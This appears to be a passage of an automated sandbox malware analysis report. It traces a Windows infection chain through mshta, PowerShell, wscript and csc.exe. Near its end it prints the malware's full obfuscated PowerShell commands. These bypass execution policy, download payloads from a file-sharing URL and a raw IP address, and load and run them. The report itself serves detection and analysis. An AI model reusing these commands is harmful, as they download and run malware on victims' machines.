          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3631Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6130Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6770Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2867Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1313Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 693Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5698Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4095Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.dllJump to dropped file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5348Thread sleep time: -19369081277395017s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5856Thread sleep count: 6770 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6024Thread sleep time: -7378697629483816s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5856Thread sleep count: 2867 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5080Thread sleep count: 1313 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5080Thread sleep count: 693 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3168Thread sleep count: 91 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2144Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3912Thread sleep count: 5698 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2128Thread sleep count: 4095 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2504Thread sleep time: -17524406870024063s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4dJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\OneCoreCommonProxyStub.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d\COMCTL32.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\dxcore.dllJump to behavior
          Source: powershell.exe, 00000001.00000002.1828783287.00000000080F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
          Source: powershell.exe, 00000003.00000002.1699204987.0000000004EF6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: wscript.exe, 00000006.00000003.1776952208.00000000057B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: powershell.exe, 00000003.00000002.1699204987.0000000004EF6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
          Source: mshta.exe, 00000000.00000002.1688117112.0000000005102000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}3H
          Source: wscript.exe, 00000006.00000003.1776952208.00000000057B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: powershell.exe, 00000001.00000002.1828783287.00000000080F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820146724.000000000731C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: powershell.exe, 00000001.00000002.1820146724.00000000072E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
          Source: powershell.exe, 00000003.00000002.1699204987.0000000004EF6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000009.00000002.1841164664.0000000007BDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Yara detected Powershell decode and execute
          Source: Yara matchFile source: amsi32_6248.amsi.csv, type: OTHER
          Yara detected Powershell download and execute
          Source: Yara matchFile source: amsi32_2492.amsi.csv, type: OTHER
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2492, type: MEMORYSTR
          Bypasses PowerShell execution policy
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaEdhaW1hZ2VCeXRlcyk7aEdhc3RhcnRGbGFnID0gRGZ3PDxCQVNFNjRfU1RBUlQ+PkRmdztoR2FlbmRGbGFnID0gRGYnKyd3PDxCQVNFNjRfRU5EPj5EZnc7aEdhc3RhcnRJbmRleCA9IGhHYWltYWdlVGV4dCcrJy5JbmRleE9mKGhHYXN0YXJ0RmxhZyk7aEdhZW5kSW5kZXggPSBoR2FpbWFnZVRleHQuSW5kZXhPZicrJyhoR2FlbmRGbGFnKTtoR2FzdGFydEluZGV4IC1nZSAwIC1hbmQgaEdhZW5kSW5kZXggLWd0IGhHYXMnKyd0YXJ0SW5kZXg7aEdhc3RhcnRJbmRleCArPSBoR2FzdGFydEYnKydsYWcuTGVuZ3RoO2hHYWJhc2U2NExlbmd0aCA9IGhHYWVuZEluZGV4IC0gaEdhc3RhcicrJ3RJbmRleDtoR2FiYXNlNjRDb21tYW5kID0gaEdhaW1hZ2VUZXh0LlN1YnN0cmluZyhoR2FzdGEnKydydEluZGV4LCBoR2FiYXNlNjRMZW5ndGgpO2hHYWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGhHYWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBOOVkgRm9yRWFjaC1PYmplY3QgeyBoR2FfIH0pWy0xLi4tKGhHYWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aEdhY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhoR2FiJysnYScrJ3NlNjRSZXZlcnNlZCk7aEdhbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGhHYWNvbW1hbmRCeXRlcyk7aEdhdmFpTScrJ2V0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZCgnKydEZndWQUlEZncpO2hHYXZhaU1ldGhvZC5JbnZva2UoaEdhbnVsbCwgQChEZnd0eHQuUlRDQ0NSVi82MjIvNTEyLjgyMS41OS4zMi8vOnB0dGhEZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2FzcG5ldF9jb21waWxlckRmdywgRGZ3ZGVzYXRpdmFkb0RmdywgRGZ3ZGVzYXRpdicrJ2FkbycrJ0RmdyxEZndkZXNhdGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3ZGVzYXRpdmFkb0RmdyxEZndkZXNhJysndGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3MURmdyxEZndkJysnZXNhdGl2YWRvRGZ3KSk7JykgIC1jUkVwTEFDRShbQ2hhcl02OCtbQ2hhcl0xMDIrW0NoYXJdMTE5KSxbQ2hhcl0zOS1jUkVwTEFDRSAgJ045WScsW0NoYXJdMTI0LVJlUExBQ0UgIChbQ2hhcl0xMDQrW0NoYXJdNzErW0NoYXJdOTcpLFtDaGFyXTM2KXwgLiggJGVOdjpjb21zUEVjWzQsMjQsMjVdLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZdVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImNUbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cWFMV2ZtcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRCeW86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4xMjguMjE1LzIyNi9zZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudElGIiwiJEVOdjpBUFBEQVRBXHNlZXRoZXBvc3NpYmxldGhpbmdzZm9yZW50aXJldGltZXRvZ2l2ZW1lYmVzdC52QnMiLDAsMCk7c3RBclQtc0xlZXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudkJzIg=='+[cHar]34+'))')))"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXEJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs" Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2022.tmp" "c:\Users\user\AppData\Local\Temp\w0uathue\CSC6F7F1D769E649D6AA11CFF4BFABFB3.TMP"Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaEdhaW1hZ2VCeXRlcyk7aEdhc3RhcnRGbGFnID0gRGZ3PDxCQVNFNjRfU1RBUlQ+PkRmdztoR2FlbmRGbGFnID0gRGYnKyd3PDxCQVNFNjRfRU5EPj5EZnc7aEdhc3RhcnRJbmRleCA9IGhHYWltYWdlVGV4dCcrJy5JbmRleE9mKGhHYXN0YXJ0RmxhZyk7aEdhZW5kSW5kZXggPSBoR2FpbWFnZVRleHQuSW5kZXhPZicrJyhoR2FlbmRGbGFnKTtoR2FzdGFydEluZGV4IC1nZSAwIC1hbmQgaEdhZW5kSW5kZXggLWd0IGhHYXMnKyd0YXJ0SW5kZXg7aEdhc3RhcnRJbmRleCArPSBoR2FzdGFydEYnKydsYWcuTGVuZ3RoO2hHYWJhc2U2NExlbmd0aCA9IGhHYWVuZEluZGV4IC0gaEdhc3RhcicrJ3RJbmRleDtoR2FiYXNlNjRDb21tYW5kID0gaEdhaW1hZ2VUZXh0LlN1YnN0cmluZyhoR2FzdGEnKydydEluZGV4LCBoR2FiYXNlNjRMZW5ndGgpO2hHYWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGhHYWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBOOVkgRm9yRWFjaC1PYmplY3QgeyBoR2FfIH0pWy0xLi4tKGhHYWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aEdhY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhoR2FiJysnYScrJ3NlNjRSZXZlcnNlZCk7aEdhbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGhHYWNvbW1hbmRCeXRlcyk7aEdhdmFpTScrJ2V0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZCgnKydEZndWQUlEZncpO2hHYXZhaU1ldGhvZC5JbnZva2UoaEdhbnVsbCwgQChEZnd0eHQuUlRDQ0NSVi82MjIvNTEyLjgyMS41OS4zMi8vOnB0dGhEZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2FzcG5ldF9jb21waWxlckRmdywgRGZ3ZGVzYXRpdmFkb0RmdywgRGZ3ZGVzYXRpdicrJ2FkbycrJ0RmdyxEZndkZXNhdGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3ZGVzYXRpdmFkb0RmdyxEZndkZXNhJysndGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3MURmdyxEZndkJysnZXNhdGl2YWRvRGZ3KSk7JykgIC1jUkVwTEFDRShbQ2hhcl02OCtbQ2hhcl0xMDIrW0NoYXJdMTE5KSxbQ2hhcl0zOS1jUkVwTEFDRSAgJ045WScsW0NoYXJdMTI0LVJlUExBQ0UgIChbQ2hhcl0xMDQrW0NoYXJdNzErW0NoYXJdOTcpLFtDaGFyXTM2KXwgLiggJGVOdjpjb21zUEVjWzQsMjQsMjVdLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')"Jump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jej5byagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfezc1uevbficagicagicagicagicagicagicagicagicagicagicagic1nru1crvjezuzptklusu9oicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb24uzexmiiwgicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagicbqbcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicageu56eg4sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihrzdvksdwludcagicagicagicagicagicagicagicagicagicagicagicbralvxbhdkyunavyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagd0epoycgicagicag